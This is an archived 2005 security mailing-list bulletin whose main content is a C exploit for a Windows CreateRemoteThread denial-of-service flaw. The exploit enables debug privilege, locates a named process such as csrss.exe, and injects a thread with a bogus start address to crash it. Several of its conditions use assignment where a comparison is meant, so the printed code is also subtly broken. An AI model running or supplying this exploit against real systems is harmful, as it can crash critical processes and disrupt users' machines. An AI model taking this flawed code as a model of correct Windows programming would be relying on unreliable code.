[EXPL] Microsoft Windows CreateRemoteThread DoS (Exploit)
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 8 Dec 2005 16:11:41 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Microsoft Windows CreateRemoteThread DoS (Exploit)
------------------------------------------------------------------------
SUMMARY
The following exploit call the function CreateRemoteThread() with the
following parameters "Process,0,0,x,0,0,0", which in turn will cause all
the processes opened by the OpenProcess function, to crash, effectively
causing a aDoS.
DETAILS
Vulnerable Systems:
* Windows XP SP 2 and prior
* Windows 2000 PRO SP 4 and prior
* Windows 2000 Server SP 4 and prior
* Windows 2000 AdvServer SP 4 and prior
* Windows 2003 AdvServer SP 1 and prior
Exploit:
#include <windows.h>
#include <tlhelp32.h>
#include <stdio.h>
BOOL exploit(char* chProcessName)
{
HANDLE hProcessSnap = NULL;
HANDLE hProcess = NULL;
BOOL bFound = FALSE;
BOOL bRet = FALSE;
PROCESSENTRY32 pe32 = {0};
UINT uExitCode = 0;
DWORD dwExitCode = 0;
LPDWORD lpExitCode = &dwExitCode;
HANDLE hToken;
TOKEN_PRIVILEGES tp;
LUID luid;
if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES |
TOKEN_QUERY | TOKEN_READ,&hToken))
return FALSE;
if(!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid))
return TRUE;
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
tp.Privileges[0].Attributes = 1 ? SE_PRIVILEGE_ENABLED : 0;
AdjustTokenPrivileges(hToken,FALSE,&tp,0,0,0);
CloseHandle(hToken);
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hProcessSnap = INVALID_HANDLE_VALUE)
return (FALSE);
pe32.dwSize = sizeof(PROCESSENTRY32);
printf("\n[+] Search For Process ... \n");
while(!bFound && Process32Next(hProcessSnap, &pe32))
{
if(lstrcmpi(pe32.szExeFile, chProcessName) = 0)
bFound = TRUE;
}
CloseHandle(hProcessSnap);
if(!bFound){
SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE),
FOREGROUND_RED| FOREGROUND_INTENSITY) ;
printf("[-] Sorry Process Not Find \n");
return(FALSE);
}
printf("[+] Process Find \n");
hProcess = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION,
FALSE, pe32.th32ProcessID);
if(hProcess = NULL){
SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE),
FOREGROUND_RED| FOREGROUND_INTENSITY) ;
printf("[-] Exploit Failed :( \n");
return(FALSE);
}
printf("[+] Send Exploit To Process ...\n");
CreateRemoteThread(hProcess,0,0,(DWORD (__stdcall *)(void
*))100,0,0,0);
printf("[+] Successful :)\n");
return(pe32.th32ProcessID);
}
int main(int argc,char **argv)
{
char* chProcess = argv[1];
COORD coordScreen = { 0, 0 };
DWORD cCharsWritten;
CONSOLE_SCREEN_BUFFER_INFO csbi;
DWORD dwConSize;
HANDLE hConsole = GetStdHandle(STD_OUTPUT_HANDLE);
GetConsoleScreenBufferInfo(hConsole, &csbi);
dwConSize = csbi.dwSize.X * csbi.dwSize.Y;
FillConsoleOutputCharacter(hConsole, TEXT(' '), dwConSize,
coordScreen, &cCharsWritten);
GetConsoleScreenBufferInfo(hConsole, &csbi);
FillConsoleOutputAttribute(hConsole, csbi.wAttributes, dwConSize,
coordScreen, &cCharsWritten);
SetConsoleCursorPosition(hConsole, coordScreen);
SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE),
FOREGROUND_GREEN| FOREGROUND_INTENSITY) ;
if(argc !=2) {
printf("\n");
printf(" ===================================== \n");
printf(" > Microsoft Windows CreateRemoteThread Exploit Version 2.0
(0day) < \n");
printf(" > Now All Process Will Crash < \n");
printf(" > BUG Find By Q7X ( Nima Salehi ) Q7X@xxxxxxxxxxxx < \n");
printf(" > Exploited By Q7X ( Nima Salehi ) Q7X@xxxxxxxxxxxx < \n");
SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE),
FOREGROUND_RED | FOREGROUND_INTENSITY|FOREGROUND_GREEN|FOREGROUND_BLUE);
printf(" > Compile : cl -o nima.c ( Win32/VC++ ) < \n");
printf(" > Usage : nima.exe Process < \n");
printf(" > Example : nima.exe csrss.exe < \n");
printf(" > Tested on : Windows XP (SP0 ,SP1 ,SP2) , Windows 2000
AdvServer (SP4) < \n");
printf(" > Windows 2000 Server (SP4), Windows 2003 (SP0 , SP1) < \n");
SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE),
FOREGROUND_RED| FOREGROUND_INTENSITY) ;
printf(" > Copyright 2002-2005 By Ashiyane Digital Network Security Team
< \n");
printf(" > www.Ashiyane.com ( Free ) www.Ashiyane.net ( Not Free ) <
\n");
printf(" > Special Tanx To My Best Friends : Behrooz_Ice - ActionSpider <
\n");
printf(" > illwill - m_lover_2003 - silversmith - crash - Uranium <
\n");
printf(" ===================================== \n");
}
else
exploit(chProcess);
SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE), FOREGROUND_RED
|FOREGROUND_GREEN|FOREGROUND_BLUE);
}
/* EoF */
ADDITIONAL INFORMATION
The information has been provided by <mailto:nima.salehi@xxxxxxxxx> Nima
salehi.
The original article can be found at: <http://www.ashiyane.com/>
http://www.ashiyane.com/
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Prev by Date: [NEWS] Dell TrueMobile 2300 Wireless Broadband Router Authentication Bypass
- Next by Date: [EXPL] FileZilla DoS Exploit (Long USER)
- Previous by thread: [NEWS] Dell TrueMobile 2300 Wireless Broadband Router Authentication Bypass
- Next by thread: [EXPL] FileZilla DoS Exploit (Long USER)
- Index(es):
Relevant Pages
- [EXPL] WinPcap NPF.SYS Privilege Elevation Vulnerability (PoC exploit)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... WinPcap NPF.SYS Privilege
Elevation Vulnerability ... Windows 2003 Server ... typedef DWORD (LPVOID
ImageBase, ... (Securiteam) - [NEWS] McAfee ePolicy Orchestrator Remote Compromise
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... request, UUID, and computer
hostname. ... The data that follows first specifies a directory and xml filename, ...
+06h DWORD file offset of XML ... (Securiteam) - [EXPL] Windows Compressed Zip File Exploit Code (MS04-034)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... WORD CompressionMethod;
... DWORD UncompressedSize; ... WORD FilenameLength; ... (Securiteam) - [EXPL] Vulnerability in Server Message Block Could Allow Elevation of Privilege (MS06-030, Explo
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... * Microsoft Windows XP
Service Pack 1 and Microsoft Windows XP Service ... typedef DWORD (LPVOID ImageBase, ...
InBuff, 2, // InBuffer, InBufferSize ... (Securiteam) - [EXPL] Windows Expand-Down Data Segment Local Privilege Escalation (Exploit)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... int (*NtSetLdtEntries)(DWORD,
DWORD, DWORD, DWORD, DWORD, DWORD); ... WORD SetupLDT(WORD seg, DWORD ldtbase);
... (Securiteam)
